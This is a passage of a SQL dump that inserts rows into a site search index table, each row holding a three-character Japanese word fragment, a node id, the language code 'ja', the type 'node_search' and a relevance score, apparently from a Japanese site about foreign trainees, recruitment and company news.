('用面接', 198, 'ja', 'node_search', 1.78178),
('用面接', 199, 'ja', 'node_search', 4.01872),
('田への', 69, 'ja', 'node_search', 1),
('田県で', 137, 'ja', 'node_search', 1),
('田県で', 139, 'ja', 'node_search', 1),
('田県に', 150, 'ja', 'node_search', 1),
('田県の', 141, 'ja', 'node_search', 1),
('田県内', 150, 'ja', 'node_search', 1),
('申し上', 133, 'ja', 'node_search', 0.794753),
('申し上', 154, 'ja', 'node_search', 1),
('申し上', 156, 'ja', 'node_search', 0.968904),
('申し上', 157, 'ja', 'node_search', 0.854391),
('申し上', 160, 'ja', 'node_search', 0.913226),
('申し上', 161, 'ja', 'node_search', 0.968904),
('申し上', 164, 'ja', 'node_search', 0.942091),
('申し上', 166, 'ja', 'node_search', 0.953396),
('申し上', 168, 'ja', 'node_search', 0.957226),
('申し上', 169, 'ja', 'node_search', 0.802752),
('申し上', 170, 'ja', 'node_search', 0.968904),
('申し上', 171, 'ja', 'node_search', 0.78951),
('申し上', 176, 'ja', 'node_search', 0.810915),
('申し上', 177, 'ja', 'node_search', 0.722831),
('申し上', 178, 'ja', 'node_search', 0.792123),
('申し上', 179, 'ja', 'node_search', 0.786915),
('申し上', 180, 'ja', 'node_search', 0.869951),
('申し上', 181, 'ja', 'node_search', 0.873132),
('申し上', 185, 'ja', 'node_search', 0.827757),
('申し上', 186, 'ja', 'node_search', 0.816452),
('申し上', 188, 'ja', 'node_search', 0.824901),
('申し上', 189, 'ja', 'node_search', 0.842342),
('申し上', 191, 'ja', 'node_search', 0.879565),
('申し上', 192, 'ja', 'node_search', 0.842342),
('申し上', 193, 'ja', 'node_search', 0.860547),
('申し上', 195, 'ja', 'node_search', 0.816452),
('申し上', 196, 'ja', 'node_search', 0.866793),
('申し上', 198, 'ja', 'node_search', 0.842342),
('申し上', 199, 'ja', 'node_search', 0.842342),
('男性の', 30, 'ja', 'node_search', 1.89608),
('界であ', 185, 'ja', 'node_search', 0.882818),
('界での', 161, 'ja', 'node_search', 1),
('界での', 193, 'ja', 'node_search', 1),
('界では', 198, 'ja', 'node_search', 0.997306),
('界でキ', 187, 'ja', 'node_search', 1),
('界で働', 166, 'ja', 'node_search', 1),
('界で働', 168, 'ja', 'node_search', 1),
('界で働', 190, 'ja', 'node_search', 1),
('界で国', 194, 'ja', 'node_search', 1),
('界で少', 18, 'ja', 'node_search', 1),
('界で新', 164, 'ja', 'node_search', 1),
('界で新', 167, 'ja', 'node_search', 1),
('界で新', 173, 'ja', 'node_search', 0.98493),
('界で新', 174, 'ja', 'node_search', 1),
('界で新', 175, 'ja', 'node_search', 1),
('界で新', 176, 'ja', 'node_search', 1),
('界で新', 177, 'ja', 'node_search', 1),
('界で活', 192, 'ja', 'node_search', 0.993146),
('界で知', 195, 'ja', 'node_search', 1),
('界に興', 155, 'ja', 'node_search', 0.727213),
('界を開', 62, 'ja', 'node_search', 0.496787),
('番号は', 27, 'ja', 'node_search', 0.891734),
('異なり', 162, 'ja', 'node_search', 0.98493),
('発いた', 156, 'ja', 'node_search', 1.93838),
('発いた', 157, 'ja', 'node_search', 1.83353),
('発おめ', 76, 'ja', 'node_search', 4),
('発おめ', 113, 'ja', 'node_search', 1),
('発され', 154, 'ja', 'node_search', 1),
('発され', 164, 'ja', 'node_search', 1.75231),
('発され', 165, 'ja', 'node_search', 1.74996),
('発され', 167, 'ja', 'node_search', 1.81645),
('発され', 169, 'ja', 'node_search', 1.78691),
('発され', 171, 'ja', 'node_search', 1.77419),
('発され', 173, 'ja', 'node_search', 1.76188),
('発され', 174, 'ja', 'node_search', 1.7185),
('発され', 175, 'ja', 'node_search', 1.76431),
('発され', 176, 'ja', 'node_search', 1.74069),
('発され', 177, 'ja', 'node_search', 1.71),
('発され', 184, 'ja', 'node_search', 1.75707),
('発した', 126, 'ja', 'node_search', 1),
('発した', 157, 'ja', 'node_search', 1),
('発しま', 78, 'ja', 'node_search', 1),
('発しま', 111, 'ja', 'node_search', 1),
('発しま', 154, 'ja', 'node_search', 0.779231),
('発しま', 156, 'ja', 'node_search', 27),
('発しま', 157, 'ja', 'node_search', 27),
('発する', 68, 'ja', 'node_search', 1),
('発する', 140, 'ja', 'node_search', 1),
('発のお', 154, 'ja', 'node_search', 27),
('発のお', 164, 'ja', 'node_search', 27),
('発のお', 165, 'ja', 'node_search', 27),
('発のお', 167, 'ja', 'node_search', 27),
('発のお', 169, 'ja', 'node_search', 27);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('発のお', 171, 'ja', 'node_search', 27),
('発のお', 176, 'ja', 'node_search', 27),
('発のお', 184, 'ja', 'node_search', 27),
('発を迎', 184, 'ja', 'node_search', 1),
('発大学', 27, 'ja', 'node_search', 0.784336),
('発揮さ', 189, 'ja', 'node_search', 0.909743),
('登録し', 28, 'ja', 'node_search', 3),
('登録し', 62, 'ja', 'node_search', 0.488796),
('登録に', 19, 'ja', 'node_search', 3),
('登録番', 27, 'ja', 'node_search', 1.89173),
('的でシ', 135, 'ja', 'node_search', 0.712106),
('的なキ', 162, 'ja', 'node_search', 1.68961),
('的なス', 135, 'ja', 'node_search', 0.876337),
('的なス', 138, 'ja', 'node_search', 0.953396),
('的なト', 136, 'ja', 'node_search', 1),
('的な会', 28, 'ja', 'node_search', 1),
('的な努', 183, 'ja', 'node_search', 1),
('的な問', 3, 'ja', 'node_search', 1),
('的な問', 136, 'ja', 'node_search', 0.705825),
('的な姿', 80, 'ja', 'node_search', 1),
('的な姿', 140, 'ja', 'node_search', 0.972861),
('的な娘', 80, 'ja', 'node_search', 1),
('的な学', 62, 'ja', 'node_search', 0.889397),
('的な学', 166, 'ja', 'node_search', 1),
('的な学', 180, 'ja', 'node_search', 1),
('的な学', 181, 'ja', 'node_search', 1),
('的な学', 192, 'ja', 'node_search', 1),
('的な学', 199, 'ja', 'node_search', 1),
('的な指', 142, 'ja', 'node_search', 0.731649),
('的な支', 179, 'ja', 'node_search', 0.833529),
('的な日', 135, 'ja', 'node_search', 1),
('的な業', 185, 'ja', 'node_search', 0.892724),
('的な経', 116, 'ja', 'node_search', 1),
('的な経', 136, 'ja', 'node_search', 0.854391),
('的な職', 194, 'ja', 'node_search', 1),
('的な課', 138, 'ja', 'node_search', 0.683725),
('的な進', 140, 'ja', 'node_search', 0.805455),
('的な関', 25, 'ja', 'node_search', 1),
('的な面', 122, 'ja', 'node_search', 1),
('的に働', 163, 'ja', 'node_search', 1),
('的に応', 135, 'ja', 'node_search', 0.747619),
('的に提', 24, 'ja', 'node_search', 0.36551),
('的に日', 87, 'ja', 'node_search', 0.863659),
('的に最', 87, 'ja', 'node_search', 0.707906),
('的に知', 133, 'ja', 'node_search', 0.906287),
('的に評', 142, 'ja', 'node_search', 1),
('皆さん', 111, 'ja', 'node_search', 1),
('皆さん', 140, 'ja', 'node_search', 3.81645),
('皆さん', 146, 'ja', 'node_search', 1),
('皆様に', 162, 'ja', 'node_search', 1),
('皆様の', 1, 'ja', 'node_search', 1),
('皆様の', 154, 'ja', 'node_search', 1),
('皆様の', 165, 'ja', 'node_search', 0.938382),
('皆様は', 167, 'ja', 'node_search', 1),
('皆様は', 169, 'ja', 'node_search', 1),
('皆様は', 173, 'ja', 'node_search', 1),
('監督し', 142, 'ja', 'node_search', 0.646943),
('監督者', 27, 'ja', 'node_search', 0.597248),
('目であ', 191, 'ja', 'node_search', 0.953396),
('目とな', 164, 'ja', 'node_search', 1),
('目とな', 171, 'ja', 'node_search', 1),
('目とな', 177, 'ja', 'node_search', 1),
('目の当', 135, 'ja', 'node_search', 0.822065),
('目を迎', 120, 'ja', 'node_search', 1),
('目指し', 26, 'ja', 'node_search', 1),
('目指し', 135, 'ja', 'node_search', 0.685676),
('目指し', 165, 'ja', 'node_search', 1),
('目指す', 155, 'ja', 'node_search', 1.74529),
('目指す', 162, 'ja', 'node_search', 1),
('目標と', 155, 'ja', 'node_search', 0.697623),
('目標に', 160, 'ja', 'node_search', 1),
('目標に', 166, 'ja', 'node_search', 1),
('目標に', 168, 'ja', 'node_search', 1),
('目標に', 170, 'ja', 'node_search', 1),
('目標に', 173, 'ja', 'node_search', 0.892724),
('目標に', 180, 'ja', 'node_search', 1),
('目標に', 183, 'ja', 'node_search', 0.854391),
('目標に', 186, 'ja', 'node_search', 1),
('目標に', 188, 'ja', 'node_search', 1),
('目標に', 190, 'ja', 'node_search', 0.98493),
('目標に', 191, 'ja', 'node_search', 0.993146),
('目標に', 192, 'ja', 'node_search', 1),
('目標に', 196, 'ja', 'node_search', 1),
('目標に', 199, 'ja', 'node_search', 1),
('目標達', 1, 'ja', 'node_search', 1),
('直接仕', 27, 'ja', 'node_search', 0.320146),
('直接輸', 23, 'ja', 'node_search', 0.854391),
('直輸入', 27, 'ja', 'node_search', 0.301545),
('相互尊', 25, 'ja', 'node_search', 1),
('省の副', 9, 'ja', 'node_search', 3),
('省の副', 17, 'ja', 'node_search', 4),
('看護ク', 136, 'ja', 'node_search', 19),
('県つく', 163, 'ja', 'node_search', 28.9611),
('県での', 162, 'ja', 'node_search', 1),
('県で働', 137, 'ja', 'node_search', 1),
('県で働', 139, 'ja', 'node_search', 1),
('県に居', 150, 'ja', 'node_search', 1),
('県の特', 141, 'ja', 'node_search', 1),
('県内で', 150, 'ja', 'node_search', 1),
('眠をと', 87, 'ja', 'node_search', 0.781775),
('着しま', 126, 'ja', 'node_search', 1),
('着する', 142, 'ja', 'node_search', 0.759465),
('睡眠を', 87, 'ja', 'node_search', 0.784336),
('知って', 3, 'ja', 'node_search', 0.792123),
('知らせ', 24, 'ja', 'node_search', 0.444243),
('知らせ', 154, 'ja', 'node_search', 27),
('知らせ', 155, 'ja', 'node_search', 2),
('知らせ', 161, 'ja', 'node_search', 32),
('知らせ', 163, 'ja', 'node_search', 4),
('知らせ', 164, 'ja', 'node_search', 27),
('知らせ', 165, 'ja', 'node_search', 27),
('知らせ', 166, 'ja', 'node_search', 32),
('知らせ', 167, 'ja', 'node_search', 27),
('知らせ', 168, 'ja', 'node_search', 32),
('知らせ', 169, 'ja', 'node_search', 27),
('知らせ', 170, 'ja', 'node_search', 32),
('知らせ', 171, 'ja', 'node_search', 27),
('知らせ', 176, 'ja', 'node_search', 27),
('知らせ', 178, 'ja', 'node_search', 32),
('知らせ', 179, 'ja', 'node_search', 31),
('知らせ', 180, 'ja', 'node_search', 32),
('知らせ', 181, 'ja', 'node_search', 28),
('知らせ', 182, 'ja', 'node_search', 5),
('知らせ', 183, 'ja', 'node_search', 5),
('知らせ', 184, 'ja', 'node_search', 27),
('知らせ', 185, 'ja', 'node_search', 32),
('知らせ', 186, 'ja', 'node_search', 32),
('知らせ', 187, 'ja', 'node_search', 32),
('知らせ', 188, 'ja', 'node_search', 32),
('知らせ', 189, 'ja', 'node_search', 32),
('知らせ', 190, 'ja', 'node_search', 32),
('知らせ', 191, 'ja', 'node_search', 32),
('知らせ', 192, 'ja', 'node_search', 32),
('知らせ', 193, 'ja', 'node_search', 32),
('知らせ', 194, 'ja', 'node_search', 32),
('知らせ', 195, 'ja', 'node_search', 32),
('知らせ', 196, 'ja', 'node_search', 32),
('知らせ', 197, 'ja', 'node_search', 32),
('知らせ', 198, 'ja', 'node_search', 32),
('知らせ', 199, 'ja', 'node_search', 32),
('知らせ', 200, 'ja', 'node_search', 32),
('知県で', 162, 'ja', 'node_search', 1),
('知識と', 30, 'ja', 'node_search', 1.84234),
('知識と', 62, 'ja', 'node_search', 1),
('知識や', 155, 'ja', 'node_search', 1),
('知識や', 190, 'ja', 'node_search', 1),
('知識や', 193, 'ja', 'node_search', 0.972861),
('知識や', 195, 'ja', 'node_search', 1),
('知識を', 133, 'ja', 'node_search', 0.899454),
('知識を', 142, 'ja', 'node_search', 0.712106),
('研修と', 169, 'ja', 'node_search', 1),
('研修に', 95, 'ja', 'node_search', 1),
('研修に', 121, 'ja', 'node_search', 1),
('研修を', 24, 'ja', 'node_search', 1),
('研修ビ', 23, 'ja', 'node_search', 0.4475),
('研修生', 6, 'ja', 'node_search', 3),
('研修生', 9, 'ja', 'node_search', 3),
('研修生', 17, 'ja', 'node_search', 4),
('研修生', 20, 'ja', 'node_search', 31),
('研修生', 23, 'ja', 'node_search', 0.430168),
('確で正', 87, 'ja', 'node_search', 0.689612),
('確な考', 87, 'ja', 'node_search', 0.683725),
('確信し', 116, 'ja', 'node_search', 1),
('磨きを', 62, 'ja', 'node_search', 4),
('磨く素', 116, 'ja', 'node_search', 1),
('礎から', 24, 'ja', 'node_search', 0.401937),
('礎教育', 27, 'ja', 'node_search', 0.35965),
('示しま', 87, 'ja', 'node_search', 0.574516),
('礼儀正', 87, 'ja', 'node_search', 0.613969),
('社です', 27, 'ja', 'node_search', 0.332135),
('社と労', 26, 'ja', 'node_search', 1),
('社と提', 62, 'ja', 'node_search', 0.776703),
('社にな', 26, 'ja', 'node_search', 1),
('社のウ', 1, 'ja', 'node_search', 7),
('社のシ', 9, 'ja', 'node_search', 28),
('社のシ', 17, 'ja', 'node_search', 29),
('社の代', 142, 'ja', 'node_search', 0.892724),
('社の存', 27, 'ja', 'node_search', 0.461031),
('社の教', 142, 'ja', 'node_search', 0.752312),
('社の目', 26, 'ja', 'node_search', 27),
('社の細', 27, 'ja', 'node_search', 0.445053),
('社の自', 27, 'ja', 'node_search', 0.351964),
('社はカ', 142, 'ja', 'node_search', 0.662985),
('社はコ', 27, 'ja', 'node_search', 0.434757),
('社はニ', 23, 'ja', 'node_search', 1),
('社は交', 5, 'ja', 'node_search', 0.876337),
('社は信', 27, 'ja', 'node_search', 0.499853),
('社は理', 27, 'ja', 'node_search', 0.545988),
('社は自', 23, 'ja', 'node_search', 0.997306),
('社も政', 23, 'ja', 'node_search', 0.7017),
('社を運', 25, 'ja', 'node_search', 1),
('社ウェ', 1, 'ja', 'node_search', 46),
('社ニュ', 23, 'ja', 'node_search', 1),
('社会に', 162, 'ja', 'node_search', 0.882818),
('社寮あ', 163, 'ja', 'node_search', 0.776703),
('社情報', 23, 'ja', 'node_search', 27),
('社株式', 9, 'ja', 'node_search', 28),
('社株式', 17, 'ja', 'node_search', 29),
('社沿革', 27, 'ja', 'node_search', 27),
('社登録', 27, 'ja', 'node_search', 1.89173),
('祈って', 111, 'ja', 'node_search', 1),
('祈りい', 160, 'ja', 'node_search', 0.845322),
('祈りい', 161, 'ja', 'node_search', 0.892724),
('祈りい', 166, 'ja', 'node_search', 0.873132),
('祈りい', 168, 'ja', 'node_search', 0.876337),
('祈りい', 170, 'ja', 'node_search', 0.886095),
('祈りい', 179, 'ja', 'node_search', 0.740689),
('祈りい', 180, 'ja', 'node_search', 0.805455),
('祈りい', 181, 'ja', 'node_search', 0.808176),
('祈りい', 186, 'ja', 'node_search', 0.774192),
('祈りい', 188, 'ja', 'node_search', 0.766757),
('祈りい', 191, 'ja', 'node_search', 0.813674),
('祈りい', 192, 'ja', 'node_search', 0.784336),
('祈りい', 193, 'ja', 'node_search', 0.800068),
('祈りい', 196, 'ja', 'node_search', 0.802752),
('祈りい', 198, 'ja', 'node_search', 0.786915),
('祈りし', 80, 'ja', 'node_search', 1),
('祈りし', 113, 'ja', 'node_search', 1),
('祈りま', 73, 'ja', 'node_search', 1),
('祈り申', 156, 'ja', 'node_search', 0.976851),
('祈り申', 157, 'ja', 'node_search', 0.860547),
('祈り申', 169, 'ja', 'node_search', 0.808176),
('祈り申', 171, 'ja', 'node_search', 0.794753),
('祈り申', 176, 'ja', 'node_search', 0.816452),
('祈り申', 177, 'ja', 'node_search', 0.727213),
('祈り申', 178, 'ja', 'node_search', 0.797402),
('祈り申', 195, 'ja', 'node_search', 0.822065),
('祖を大', 69, 'ja', 'node_search', 1),
('祝いす', 165, 'ja', 'node_search', 0.892724),
('祝いす', 195, 'ja', 'node_search', 0.889397),
('祝い申', 154, 'ja', 'node_search', 1),
('祝い申', 160, 'ja', 'node_search', 0.920273),
('祝い申', 161, 'ja', 'node_search', 0.976851),
('祝い申', 164, 'ja', 'node_search', 0.949597),
('祝い申', 166, 'ja', 'node_search', 0.961087),
('祝い申', 168, 'ja', 'node_search', 0.96498),
('祝い申', 170, 'ja', 'node_search', 0.976851),
('祝い申', 179, 'ja', 'node_search', 0.792123),
('祝い申', 180, 'ja', 'node_search', 0.876337),
('祝い申', 181, 'ja', 'node_search', 0.879565),
('祝い申', 185, 'ja', 'node_search', 0.833529),
('祝い申', 186, 'ja', 'node_search', 0.822065),
('祝い申', 188, 'ja', 'node_search', 0.830633),
('祝い申', 189, 'ja', 'node_search', 0.848323),
('祝い申', 191, 'ja', 'node_search', 0.886095),
('祝い申', 192, 'ja', 'node_search', 0.848323),
('祝い申', 193, 'ja', 'node_search', 0.866793),
('祝い申', 196, 'ja', 'node_search', 0.873132),
('祝い申', 198, 'ja', 'node_search', 0.848323),
('祝い申', 199, 'ja', 'node_search', 0.848323),
('祝う上', 120, 'ja', 'node_search', 19),
('福岡へ', 80, 'ja', 'node_search', 1),
('秀な成', 81, 'ja', 'node_search', 4),
('私たち', 1, 'ja', 'node_search', 1),
('私たち', 27, 'ja', 'node_search', 0.776331),
('私たち', 28, 'ja', 'node_search', 1),
('私たち', 62, 'ja', 'node_search', 4),
('私たち', 69, 'ja', 'node_search', 1),
('私たち', 136, 'ja', 'node_search', 1),
('私たち', 138, 'ja', 'node_search', 0.733888),
('私たち', 140, 'ja', 'node_search', 1),
('私にと', 135, 'ja', 'node_search', 0.800068),
('私の可', 120, 'ja', 'node_search', 1),
('私の賞', 122, 'ja', 'node_search', 0.920273),
('私を信', 69, 'ja', 'node_search', 0.923838),
('秋田へ', 69, 'ja', 'node_search', 1),
('秋田県', 137, 'ja', 'node_search', 1),
('秋田県', 139, 'ja', 'node_search', 1),
('秋田県', 141, 'ja', 'node_search', 1),
('秋田県', 150, 'ja', 'node_search', 2),
('科大学', 27, 'ja', 'node_search', 0.35398),
('科書付', 155, 'ja', 'node_search', 0.863659),
('科書料', 62, 'ja', 'node_search', 1.17204),
('称賛し', 140, 'ja', 'node_search', 1),
('移動の', 162, 'ja', 'node_search', 0.754681),
('移行し', 7, 'ja', 'node_search', 1.78217),
('移行を', 142, 'ja', 'node_search', 0.638366),
('程を修', 181, 'ja', 'node_search', 1),
('程を修', 183, 'ja', 'node_search', 1),
('税など', 8, 'ja', 'node_search', 2),
('税もき', 23, 'ja', 'node_search', 0.813674),
('種サル', 27, 'ja', 'node_search', 0.329927),
('種バス', 27, 'ja', 'node_search', 0.32348),
('種商用', 27, 'ja', 'node_search', 0.327316),
('種手続', 184, 'ja', 'node_search', 1),
('種機械', 27, 'ja', 'node_search', 0.32264),
('積みな', 175, 'ja', 'node_search', 0.920273),
('積みな', 176, 'ja', 'node_search', 0.949597),
('積みな', 177, 'ja', 'node_search', 0.833529),
('積みな', 184, 'ja', 'node_search', 0.845322),
('積みな', 190, 'ja', 'node_search', 0.854391),
('積みな', 197, 'ja', 'node_search', 0.857458),
('積み重', 179, 'ja', 'node_search', 0.997306),
('積み重', 182, 'ja', 'node_search', 1),
('積み重', 184, 'ja', 'node_search', 0.989021),
('積み重', 190, 'ja', 'node_search', 1),
('積み重', 191, 'ja', 'node_search', 1),
('積み重', 199, 'ja', 'node_search', 0.968904),
('積むこ', 136, 'ja', 'node_search', 1.59645),
('積むた', 95, 'ja', 'node_search', 19),
('積むた', 194, 'ja', 'node_search', 1),
('積めな', 98, 'ja', 'node_search', 1),
('積極的', 135, 'ja', 'node_search', 0.752312),
('穫作業', 163, 'ja', 'node_search', 0.920273),
('立され', 23, 'ja', 'node_search', 1),
('立され', 27, 'ja', 'node_search', 2.56049),
('立つた', 24, 'ja', 'node_search', 0.407276),
('竣工工', 27, 'ja', 'node_search', 0.839384),
('第一歩', 160, 'ja', 'node_search', 4),
('第一歩', 161, 'ja', 'node_search', 1),
('第一歩', 168, 'ja', 'node_search', 0.813674),
('第一歩', 170, 'ja', 'node_search', 0.797402),
('第一歩', 174, 'ja', 'node_search', 0.913226),
('第一歩', 177, 'ja', 'node_search', 0.882818),
('第一歩', 180, 'ja', 'node_search', 0.945829),
('第一歩', 184, 'ja', 'node_search', 0.899454),
('第一歩', 186, 'ja', 'node_search', 0.98493),
('第一歩', 187, 'ja', 'node_search', 1),
('第一歩', 191, 'ja', 'node_search', 0.916736),
('第一歩', 192, 'ja', 'node_search', 0.945829),
('第一歩', 197, 'ja', 'node_search', 1),
('筆記練', 138, 'ja', 'node_search', 1),
('等学校', 27, 'ja', 'node_search', 0.358086),
('策だけ', 155, 'ja', 'node_search', 1),
('策や実', 155, 'ja', 'node_search', 1),
('策クラ', 155, 'ja', 'node_search', 33),
('算など', 27, 'ja', 'node_search', 0.53161),
('管理し', 24, 'ja', 'node_search', 0.467218),
('管理し', 26, 'ja', 'node_search', 1),
('管理で', 5, 'ja', 'node_search', 0.98493),
('管理経', 30, 'ja', 'node_search', 1.84234),
('管理職', 7, 'ja', 'node_search', 1.8861),
('管理補', 163, 'ja', 'node_search', 0.896076),
('管理責', 27, 'ja', 'node_search', 0.604732),
('箱詰め', 163, 'ja', 'node_search', 0.889397),
('節目で', 191, 'ja', 'node_search', 0.957226),
('節目と', 164, 'ja', 'node_search', 1),
('節目と', 171, 'ja', 'node_search', 1),
('節目と', 177, 'ja', 'node_search', 1),
('節目を', 120, 'ja', 'node_search', 1),
('範的な', 80, 'ja', 'node_search', 1),
('築かれ', 156, 'ja', 'node_search', 1),
('築かれ', 157, 'ja', 'node_search', 0.909743),
('築かれ', 167, 'ja', 'node_search', 0.931053),
('築くこ', 25, 'ja', 'node_search', 1),
('築くこ', 163, 'ja', 'node_search', 0.997306),
('築くた', 175, 'ja', 'node_search', 1),
('築くた', 178, 'ja', 'node_search', 1),
('築くた', 187, 'ja', 'node_search', 1),
('築株式', 23, 'ja', 'node_search', 2.16971),
('築業関', 24, 'ja', 'node_search', 0.606252),
('築設計', 27, 'ja', 'node_search', 0.625114),
('籍青少', 27, 'ja', 'node_search', 0.802752),
('粘り強', 192, 'ja', 'node_search', 1),
('粘り強', 196, 'ja', 'node_search', 1),
('系的に', 133, 'ja', 'node_search', 0.909743),
('納税も', 23, 'ja', 'node_search', 0.816452),
('素晴ら', 116, 'ja', 'node_search', 1),
('素晴ら', 154, 'ja', 'node_search', 0.920273),
('素晴ら', 156, 'ja', 'node_search', 1),
('素晴ら', 157, 'ja', 'node_search', 0.945829),
('素晴ら', 160, 'ja', 'node_search', 0.96498),
('素晴ら', 164, 'ja', 'node_search', 0.993146),
('素晴ら', 166, 'ja', 'node_search', 1),
('素晴ら', 168, 'ja', 'node_search', 0.863659),
('素晴ら', 170, 'ja', 'node_search', 0.873132),
('素晴ら', 171, 'ja', 'node_search', 1),
('素晴ら', 174, 'ja', 'node_search', 0.830633),
('素晴ら', 177, 'ja', 'node_search', 0.997306),
('素晴ら', 178, 'ja', 'node_search', 1),
('素晴ら', 181, 'ja', 'node_search', 1),
('素晴ら', 182, 'ja', 'node_search', 1),
('素晴ら', 183, 'ja', 'node_search', 1),
('素晴ら', 194, 'ja', 'node_search', 0.934703),
('素晴ら', 195, 'ja', 'node_search', 0.931053),
('素晴ら', 197, 'ja', 'node_search', 0.927431),
('素晴ら', 198, 'ja', 'node_search', 0.886095),
('素晴ら', 199, 'ja', 'node_search', 0.797402),
('細につ', 155, 'ja', 'node_search', 0.683725),
('細につ', 162, 'ja', 'node_search', 0.638366),
('細を確', 62, 'ja', 'node_search', 2.56708),
('細部へ', 27, 'ja', 'node_search', 0.443437),
('紹介い', 162, 'ja', 'node_search', 1),
('紹介に', 23, 'ja', 'node_search', 0.661163),
('紹介を', 23, 'ja', 'node_search', 0.543537),
('紹介を', 24, 'ja', 'node_search', 1.62189),
('終了し', 133, 'ja', 'node_search', 0.920273),
('組める', 135, 'ja', 'node_search', 1),
('組んで', 77, 'ja', 'node_search', 1),
('組んで', 150, 'ja', 'node_search', 1),
('組織さ', 27, 'ja', 'node_search', 1),
('経て今', 184, 'ja', 'node_search', 1),
('経費を', 8, 'ja', 'node_search', 2),
('経験が', 18, 'ja', 'node_search', 1),
('経験が', 30, 'ja', 'node_search', 3.68468),
('経験が', 163, 'ja', 'node_search', 1),
('経験と', 164, 'ja', 'node_search', 0.860547),
('経験と', 185, 'ja', 'node_search', 0.945829),
('経験と', 194, 'ja', 'node_search', 0.842342),
('経験に', 174, 'ja', 'node_search', 0.816452),
('経験に', 192, 'ja', 'node_search', 0.899454),
('経験も', 138, 'ja', 'node_search', 0.923838),
('経験や', 187, 'ja', 'node_search', 0.923838),
('経験や', 198, 'ja', 'node_search', 0.972861),
('経験を', 7, 'ja', 'node_search', 1.80993),
('経験を', 62, 'ja', 'node_search', 1),
('経験を', 95, 'ja', 'node_search', 19),
('経験を', 98, 'ja', 'node_search', 1),
('経験を', 116, 'ja', 'node_search', 1),
('経験を', 133, 'ja', 'node_search', 1),
('経験を', 136, 'ja', 'node_search', 1.60539),
('経験を', 163, 'ja', 'node_search', 1),
('経験を', 167, 'ja', 'node_search', 0.993146),
('経験を', 169, 'ja', 'node_search', 0.938382),
('経験を', 173, 'ja', 'node_search', 0.920273),
('経験を', 175, 'ja', 'node_search', 0.931053),
('経験を', 176, 'ja', 'node_search', 0.961087),
('経験を', 177, 'ja', 'node_search', 0.842342),
('経験を', 184, 'ja', 'node_search', 0.854391),
('経験を', 190, 'ja', 'node_search', 0.863659),
('経験を', 193, 'ja', 'node_search', 1),
('経験を', 194, 'ja', 'node_search', 1),
('経験を', 197, 'ja', 'node_search', 0.866793),
('経験者', 162, 'ja', 'node_search', 0.650439),
('経験者', 163, 'ja', 'node_search', 0.712106),
('経験豊', 7, 'ja', 'node_search', 3.71415),
('経験豊', 8, 'ja', 'node_search', 2),
('経験豊', 10, 'ja', 'node_search', 3),
('経験豊', 18, 'ja', 'node_search', 1),
('経験豊', 23, 'ja', 'node_search', 1.01357),
('経験豊', 24, 'ja', 'node_search', 1),
('経験豊', 116, 'ja', 'node_search', 1),
('経験豊', 135, 'ja', 'node_search', 1),
('経験豊', 136, 'ja', 'node_search', 1),
('経験豊', 138, 'ja', 'node_search', 1),
('結びつ', 179, 'ja', 'node_search', 0.902857),
('結んだ', 191, 'ja', 'node_search', 1),
('結果が', 29, 'ja', 'node_search', 3),
('結果で', 191, 'ja', 'node_search', 1),
('結果に', 189, 'ja', 'node_search', 0.886095),
('結果に', 194, 'ja', 'node_search', 0.916736),
('結果に', 197, 'ja', 'node_search', 0.909743),
('結果を', 179, 'ja', 'node_search', 1),
('給しま', 18, 'ja', 'node_search', 1),
('給与の', 5, 'ja', 'node_search', 1),
('統につ', 122, 'ja', 'node_search', 1),
('統に対', 122, 'ja', 'node_search', 0.938382),
('統に関', 3, 'ja', 'node_search', 0.816452),
('継続し', 182, 'ja', 'node_search', 1),
('継続的', 24, 'ja', 'node_search', 0.366597),
('継続的', 87, 'ja', 'node_search', 0.869951),
('継続的', 140, 'ja', 'node_search', 0.810915),
('継続的', 166, 'ja', 'node_search', 1),
('継続的', 179, 'ja', 'node_search', 0.839384),
('継続的', 180, 'ja', 'node_search', 1),
('継続的', 181, 'ja', 'node_search', 1),
('継続的', 183, 'ja', 'node_search', 1),
('継続的', 192, 'ja', 'node_search', 1),
('継続的', 199, 'ja', 'node_search', 1),
('続きが', 178, 'ja', 'node_search', 0.945829),
('続きが', 187, 'ja', 'node_search', 0.860547),
('続きが', 190, 'ja', 'node_search', 0.902857),
('続きが', 194, 'ja', 'node_search', 0.879565),
('続きと', 160, 'ja', 'node_search', 0.876337),
('続きと', 161, 'ja', 'node_search', 0.927431),
('続きと', 166, 'ja', 'node_search', 0.913226),
('続きと', 168, 'ja', 'node_search', 0.916736),
('続きと', 170, 'ja', 'node_search', 0.927431),
('続きと', 179, 'ja', 'node_search', 0.766757),
('続きと', 191, 'ja', 'node_search', 0.845322),
('続きと', 193, 'ja', 'node_search', 0.827757),
('続きと', 195, 'ja', 'node_search', 0.857458),
('続きと', 198, 'ja', 'node_search', 0.813674),
('続きや', 186, 'ja', 'node_search', 0.909743),
('続きを', 184, 'ja', 'node_search', 1),
('続きサ', 186, 'ja', 'node_search', 0.866793),
('続き溶', 3, 'ja', 'node_search', 0.662985),
('続けて', 23, 'ja', 'node_search', 1.29018),
('続けて', 140, 'ja', 'node_search', 0.953396),
('続けて', 160, 'ja', 'node_search', 0.76188),
('続けら', 183, 'ja', 'node_search', 0.824901),
('続ける', 80, 'ja', 'node_search', 1),
('続ける', 116, 'ja', 'node_search', 1),
('続して', 182, 'ja', 'node_search', 1),
('続期間', 27, 'ja', 'node_search', 0.45843),
('続的な', 25, 'ja', 'node_search', 1),
('続的な', 140, 'ja', 'node_search', 0.808176),
('続的な', 166, 'ja', 'node_search', 1),
('続的な', 179, 'ja', 'node_search', 0.836446),
('続的な', 180, 'ja', 'node_search', 1),
('続的な', 181, 'ja', 'node_search', 1),
('続的な', 183, 'ja', 'node_search', 1),
('続的な', 192, 'ja', 'node_search', 1),
('続的な', 199, 'ja', 'node_search', 1),
('続的に', 24, 'ja', 'node_search', 0.366053),
('続的に', 87, 'ja', 'node_search', 0.866793),
('維持し', 142, 'ja', 'node_search', 1),
('緊急で', 10, 'ja', 'node_search', 3),
('緊急で', 18, 'ja', 'node_search', 3),
('緊急に', 30, 'ja', 'node_search', 3),
('総まと', 62, 'ja', 'node_search', 0.561181),
('総合マ', 62, 'ja', 'node_search', 1.65918),
('総局と', 27, 'ja', 'node_search', 0.740689),
('練を受', 23, 'ja', 'node_search', 0.558589),
('練労働', 30, 'ja', 'node_search', 28),
('練校を', 9, 'ja', 'node_search', 3),
('練校を', 17, 'ja', 'node_search', 4),
('練習す', 138, 'ja', 'node_search', 0.776703),
('練習を', 24, 'ja', 'node_search', 1),
